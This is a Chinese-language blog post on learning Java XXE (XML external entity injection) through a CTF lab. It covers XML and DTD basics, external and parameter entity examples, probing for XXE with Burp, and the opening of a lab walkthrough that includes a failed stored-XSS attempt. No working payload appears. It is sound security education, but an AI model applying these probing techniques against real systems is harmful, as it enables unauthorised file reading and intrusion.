<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="前言从一到题目学习xxe漏洞(:附带实验环境 0x01.xxe漏洞XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件">
<meta property="og:type" content="article">
<meta property="og:title" content="java xxe篇">
<meta property="og:url" content="http://yoursite.com/2022/02/27/java-xxe篇/index.html">
<meta property="og:site_name" content="L&#39;s Blog">
<meta property="og:description" content="前言从一到题目学习xxe漏洞(:附带实验环境 0x01.xxe漏洞XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-3.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-5.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-6.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-7.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-8.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-9.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-10.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-11.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-12.png">
<meta property="og:updated_time" content="2022-02-27T03:02:42.437Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="java xxe篇">
<meta name="twitter:description" content="前言从一到题目学习xxe漏洞(:附带实验环境 0x01.xxe漏洞XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件">
<meta name="twitter:image" content="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2022/02/27/java-xxe篇/">





  <title>java xxe篇 | L's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">L's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">share with you</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2022/02/27/java-xxe篇/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ljdd520">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="L's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">java xxe篇</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2022-02-27T10:59:53+08:00">
                2022-02-27
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf学习之路/" itemprop="url" rel="index">
                    <span itemprop="name">ctf学习之路</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf学习之路/xxe/" itemprop="url" rel="index">
                    <span itemprop="name">xxe</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2.1k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  9
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>从一到题目学习xxe漏洞(:附带实验环境</p>
<h4 id="0x01-xxe漏洞"><a href="#0x01-xxe漏洞" class="headerlink" title="0x01.xxe漏洞"></a>0x01.xxe漏洞</h4><h6 id="XXE漏洞全称XML-External-Entity-Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。"><a href="#XXE漏洞全称XML-External-Entity-Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。" class="headerlink" title="XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。"></a>XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。</h6><h4 id="0x02-xml定义"><a href="#0x02-xml定义" class="headerlink" title="0x02.xml定义"></a>0x02.xml定义</h4><h6 id="XML由3个部分构成，它们分别是：文档类型定义-Document-Type-Definition，DTD-，即XML的布局语言；可扩展的样式语言-Extensible-Style-Language，XSL-，即XML的样式表语言；以及可扩展链接语言-Extensible-Link-Language，XLL-。"><a href="#XML由3个部分构成，它们分别是：文档类型定义-Document-Type-Definition，DTD-，即XML的布局语言；可扩展的样式语言-Extensible-Style-Language，XSL-，即XML的样式表语言；以及可扩展链接语言-Extensible-Link-Language，XLL-。" class="headerlink" title="XML由3个部分构成，它们分别是：文档类型定义(Document Type Definition，DTD)，即XML的布局语言；可扩展的样式语言(Extensible Style Language，XSL)，即XML的样式表语言；以及可扩展链接语言(Extensible Link Language，XLL)。"></a>XML由3个部分构成，它们分别是：文档类型定义(Document Type Definition，DTD)，即XML的布局语言；可扩展的样式语言(Extensible Style Language，XSL)，即XML的样式表语言；以及可扩展链接语言(Extensible Link Language，XLL)。</h6><h4 id="0x02-xml的作用"><a href="#0x02-xml的作用" class="headerlink" title="0x02.xml的作用"></a>0x02.xml的作用</h4><h6 id="XML使用元素和属性来描述数-据。在数据传送过程中，XML始终保留了诸如父-子关系这样的数据结构。几个应用程序-可以共享和解析同一个XML文件，不必使用传统的字符串解析或拆解过程。"><a href="#XML使用元素和属性来描述数-据。在数据传送过程中，XML始终保留了诸如父-子关系这样的数据结构。几个应用程序-可以共享和解析同一个XML文件，不必使用传统的字符串解析或拆解过程。" class="headerlink" title="XML使用元素和属性来描述数 据。在数据传送过程中，XML始终保留了诸如父/子关系这样的数据结构。几个应用程序 可以共享和解析同一个XML文件，不必使用传统的字符串解析或拆解过程。"></a>XML使用元素和属性来描述数 据。在数据传送过程中，XML始终保留了诸如父/子关系这样的数据结构。几个应用程序 可以共享和解析同一个XML文件，不必使用传统的字符串解析或拆解过程。</h6><h6 id="基本语法"><a href="#基本语法" class="headerlink" title="基本语法"></a>基本语法</h6><ul>
<li>所有 XML 元素都须有关闭标签。</li>
<li>XML 标签对大小写敏感。</li>
<li>XML 必须正确地嵌套。</li>
<li>XML 文档必须有根元素。</li>
<li>XML 的属性值须加引号。</li>
<li>实体引用(在标签属性，以及对应的位置值可能会出现&lt;&gt;符号，但是这些符号在对应的XML中都是有特殊含义的，这时候我们必须使用对应html的实体对应的表示，比如&lt;傅好对应的实体就是<code>&amp;lt;</code>，&gt;符号对应的实体就是<code>&amp;gt;</code>)</li>
<li>XML中的注释，在XML中编写注释的语法与 HTML 的语法很相似。(<code>&lt;!-- --&gt;</code>)</li>
<li>在 XML 中，空格会被保留,多个空格不会被合并为一个。</li>
</ul>
<h6 id="示例如下："><a href="#示例如下：" class="headerlink" title="示例如下："></a>示例如下：</h6><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">&lt;!-- ⬆XML声明⬆ --&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;!DOCTYPE  文件名 [</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">&lt;!ENTITY实体名 "实体内容"&gt;</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">&lt;!-- ⬆文档类型定义(DTD)⬆ --&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">元素名称</span> <span class="attr">category</span>=<span class="string">"属性"</span>&gt;</span></span><br><span class="line"></span><br><span class="line">文本或其他元素</span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">元素名称</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">&lt;!-- ⬆文档元素⬆ --&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="0x03-xml格式说明"><a href="#0x03-xml格式说明" class="headerlink" title="0x03.xml格式说明"></a>0x03.xml格式说明</h4><h6 id="XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义-可选-、文档元素。"><a href="#XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义-可选-、文档元素。" class="headerlink" title="XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。"></a>XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。</h6><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="utf-8" ?&gt;</span><span class="comment">&lt;!--xml声明--&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;!DOCTYPE note [</span></span><br><span class="line"><span class="meta">        &lt;!ELEMENT note (to,from,heading,body)&gt;</span></span><br><span class="line"><span class="meta">        &lt;!ELEMENT to (#PCDATA)&gt;</span></span><br><span class="line"><span class="meta">        &lt;!ELEMENT from (#PCDATA)&gt;</span></span><br><span class="line"><span class="meta">        &lt;!ELEMENT heading (#PCDATA)&gt;</span></span><br><span class="line"><span class="meta">        &lt;!ELEMENT body (#PCDATA)&gt;</span></span><br><span class="line"><span class="meta">        ]&gt;</span><span class="comment">&lt;!--文档类型定义--&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">note</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">to</span>&gt;</span>xxe<span class="tag">&lt;/<span class="name">to</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">from</span>&gt;</span>ljpm<span class="tag">&lt;/<span class="name">from</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">heading</span>&gt;</span>Text<span class="tag">&lt;/<span class="name">heading</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">body</span>&gt;</span>Only test!<span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">note</span>&gt;</span><span class="comment">&lt;!--文档元素--&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="0x04-DTD"><a href="#0x04-DTD" class="headerlink" title="0x04.DTD"></a>0x04.DTD</h4><h6 id="文档类型定义-DTD-可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD可被成行地声明于XML文档中，也可作为一个外部引用。带有DTD的XML文档实例"><a href="#文档类型定义-DTD-可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD可被成行地声明于XML文档中，也可作为一个外部引用。带有DTD的XML文档实例" class="headerlink" title="文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD可被成行地声明于XML文档中，也可作为一个外部引用。带有DTD的XML文档实例"></a>文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD可被成行地声明于XML文档中，也可作为一个外部引用。带有DTD的XML文档实例</h6><h5 id="1-外部DTD"><a href="#1-外部DTD" class="headerlink" title="1.外部DTD"></a>1.外部DTD</h5><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="utf-8" ?&gt;</span><span class="comment">&lt;!--xml声明--&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;!DOCTYPE root-element SYSTEM "test.dtd"&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">note</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">to</span>&gt;</span>xxe<span class="tag">&lt;/<span class="name">to</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">from</span>&gt;</span>ljpm<span class="tag">&lt;/<span class="name">from</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">heading</span>&gt;</span>Text<span class="tag">&lt;/<span class="name">heading</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">body</span>&gt;</span>Only test!<span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">note</span>&gt;</span><span class="comment">&lt;!--文档元素--&gt;</span></span><br></pre></td></tr></table></figure>

<h6 id="test-dtd"><a href="#test-dtd" class="headerlink" title="test.dtd"></a>test.dtd</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ELEMENT to (#PCDATA)&gt;</span><br><span class="line">&lt;!ELEMENT from (#PCDATA)&gt;</span><br><span class="line">&lt;!ELEMENT heading (#PCDATA)&gt;</span><br><span class="line">&lt;!ELEMENT body (#PCDATA)&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x05-DTD数据类型"><a href="#0x05-DTD数据类型" class="headerlink" title="0x05.DTD数据类型"></a>0x05.DTD数据类型</h4><ul>
<li>PCDATA的意思是被解析的字符数据/</li>
<li>PCDATA的意思是被解析的字符数据，PCDATA是会被解析器解析的文本</li>
<li>CDATA的意思是字符数据</li>
<li>CDATA是不会被解析器解析的文本，在这些文本中的标签不会被当作标记来对待，其中的实体也不会被展开。</li>
</ul>
<h4 id="0x06-DTD实体介绍"><a href="#0x06-DTD实体介绍" class="headerlink" title="0x06.DTD实体介绍"></a>0x06.DTD实体介绍</h4><h5 id="1-内部实体"><a href="#1-内部实体" class="headerlink" title="1.内部实体"></a>1.内部实体</h5><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="utf-8" ?&gt;</span><span class="comment">&lt;!--xml声明--&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;!DOCTYPE note[</span></span><br><span class="line"><span class="meta">        &lt;!ELEMENT note (name,pwd)&gt;</span></span><br><span class="line"><span class="meta">        &lt;!ENTITY name "admin"&gt;</span></span><br><span class="line"><span class="meta">        &lt;!ENTITY pwd "admin"&gt;</span></span><br><span class="line"><span class="meta">        ]&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">note</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">name</span>&gt;</span>&amp;name;<span class="tag">&lt;/<span class="name">name</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">pwd</span>&gt;</span>&amp;pwd;<span class="tag">&lt;/<span class="name">pwd</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">note</span>&gt;</span><span class="comment">&lt;!--文档元素--&gt;</span></span><br></pre></td></tr></table></figure>

<h6 id="结果如下："><a href="#结果如下：" class="headerlink" title="结果如下："></a>结果如下：</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-1.png" alt></p>
<h5 id="2-外部实体"><a href="#2-外部实体" class="headerlink" title="2.外部实体"></a>2.外部实体</h5><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="utf-8" ?&gt;</span><span class="comment">&lt;!--xml声明--&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;!DOCTYPE note[</span></span><br><span class="line"><span class="meta">        &lt;!ENTITY user SYSTEM "test.xml"&gt;</span></span><br><span class="line"><span class="meta">        ]&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">note</span>&gt;</span>&amp;user;<span class="tag">&lt;/<span class="name">note</span>&gt;</span><span class="comment">&lt;!--文档元素--&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="3-参数实体-外部实体"><a href="#3-参数实体-外部实体" class="headerlink" title="3.参数实体+外部实体"></a>3.参数实体+外部实体</h5><h6 id="test-xml"><a href="#test-xml" class="headerlink" title="test.xml"></a><code>test.xml</code></h6><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="utf-8" ?&gt;</span><span class="comment">&lt;!--xml声明--&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;!DOCTYPE note [</span></span><br><span class="line"><span class="meta">        &lt;!ENTITY % user "admin"&gt;</span></span><br><span class="line"><span class="meta">        &lt;!ENTITY % pwd "admin"&gt;</span></span><br><span class="line"><span class="meta">        &lt;!ENTITY % ljpm SYSTEM "./dddd.dtd"&gt;</span></span><br><span class="line"><span class="meta">        %ljpm;</span></span><br><span class="line"><span class="meta">        ]&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">note</span>&gt;</span>&amp;people;<span class="tag">&lt;/<span class="name">note</span>&gt;</span><span class="comment">&lt;!--文档元素--&gt;</span></span><br></pre></td></tr></table></figure>

<h6 id="dddd-dtd"><a href="#dddd-dtd" class="headerlink" title="dddd.dtd"></a><code>dddd.dtd</code></h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY people &quot;%user;%pwd;&quot;&gt;</span><br></pre></td></tr></table></figure>

<h6 id="PS-name-参数实体-是在DTD中被引用的，而-amp-name-是在xml文档中被引用的。"><a href="#PS-name-参数实体-是在DTD中被引用的，而-amp-name-是在xml文档中被引用的。" class="headerlink" title="PS: %name(参数实体)是在DTD中被引用的，而&amp;name;是在xml文档中被引用的。"></a>PS: <code>%name</code>(参数实体)是在DTD中被引用的，而<code>&amp;name;</code>是在xml文档中被引用的。</h6><h6 id="XXE主要是利用了DTD引用外部实体导致的漏洞。"><a href="#XXE主要是利用了DTD引用外部实体导致的漏洞。" class="headerlink" title="XXE主要是利用了DTD引用外部实体导致的漏洞。"></a>XXE主要是利用了DTD引用外部实体导致的漏洞。</h6><h4 id="0x07-怎么判断网站是否存在XXE漏洞"><a href="#0x07-怎么判断网站是否存在XXE漏洞" class="headerlink" title="0x07.怎么判断网站是否存在XXE漏洞"></a>0x07.怎么判断网站是否存在XXE漏洞</h4><h6 id="最直接的方法就是用burp抓包，然后，修改HTTP请求方法，修改Content-Type头部字段等等，查看返回包的响应，看看应用程序是否解析了发送的内容，一旦解析了，那么有可能XXE攻击漏洞。"><a href="#最直接的方法就是用burp抓包，然后，修改HTTP请求方法，修改Content-Type头部字段等等，查看返回包的响应，看看应用程序是否解析了发送的内容，一旦解析了，那么有可能XXE攻击漏洞。" class="headerlink" title="最直接的方法就是用burp抓包，然后，修改HTTP请求方法，修改Content-Type头部字段等等，查看返回包的响应，看看应用程序是否解析了发送的内容，一旦解析了，那么有可能XXE攻击漏洞。"></a>最直接的方法就是用burp抓包，然后，修改HTTP请求方法，修改Content-Type头部字段等等，查看返回包的响应，看看应用程序是否解析了发送的内容，一旦解析了，那么有可能XXE攻击漏洞。</h6><h4 id="0x08-示例如下："><a href="#0x08-示例如下：" class="headerlink" title="0x08.示例如下："></a>0x08.示例如下：</h4><h5 id="1-实验环境"><a href="#1-实验环境" class="headerlink" title="1.实验环境"></a>1.实验环境</h5><h6 id="SpecialOrder"><a href="#SpecialOrder" class="headerlink" title="SpecialOrder"></a><a href="https://github.com/pop-eax/SpecialOrder/archive/master.zip" target="_blank" rel="noopener">SpecialOrder</a></h6><h5 id="2-分析"><a href="#2-分析" class="headerlink" title="2.分析"></a>2.分析</h5><h6 id="首页登录试验环境将会被重定向到一个登录界面："><a href="#首页登录试验环境将会被重定向到一个登录界面：" class="headerlink" title="首页登录试验环境将会被重定向到一个登录界面："></a>首页登录试验环境将会被重定向到一个登录界面：</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-2.png" alt></p>
<h6 id="环境有个注册选项，我们先注册一个用户，然后登录："><a href="#环境有个注册选项，我们先注册一个用户，然后登录：" class="headerlink" title="环境有个注册选项，我们先注册一个用户，然后登录："></a>环境有个注册选项，我们先注册一个用户，然后登录：</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-3.png" alt></p>
<h6 id="首页的右上角有几个路由，代表几个功能，我们可以一一尝试。"><a href="#首页的右上角有几个路由，代表几个功能，我们可以一一尝试。" class="headerlink" title="首页的右上角有几个路由，代表几个功能，我们可以一一尝试。"></a>首页的右上角有几个路由，代表几个功能，我们可以一一尝试。</h6><h6 id="在http-192-168-153-128-5000-create-post-url下有一个类似于博客的提交框，可能存在存储性的xss"><a href="#在http-192-168-153-128-5000-create-post-url下有一个类似于博客的提交框，可能存在存储性的xss" class="headerlink" title="在http://192.168.153.128:5000/create-post url下有一个类似于博客的提交框，可能存在存储性的xss"></a>在<code>http://192.168.153.128:5000/create-post</code> url下有一个类似于博客的提交框，可能存在存储性的xss</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-4.png" alt></p>
<h6 id="尝试了一下，不存在xss"><a href="#尝试了一下，不存在xss" class="headerlink" title="尝试了一下，不存在xss"></a>尝试了一下，不存在xss</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/xml-5.png" alt></p>
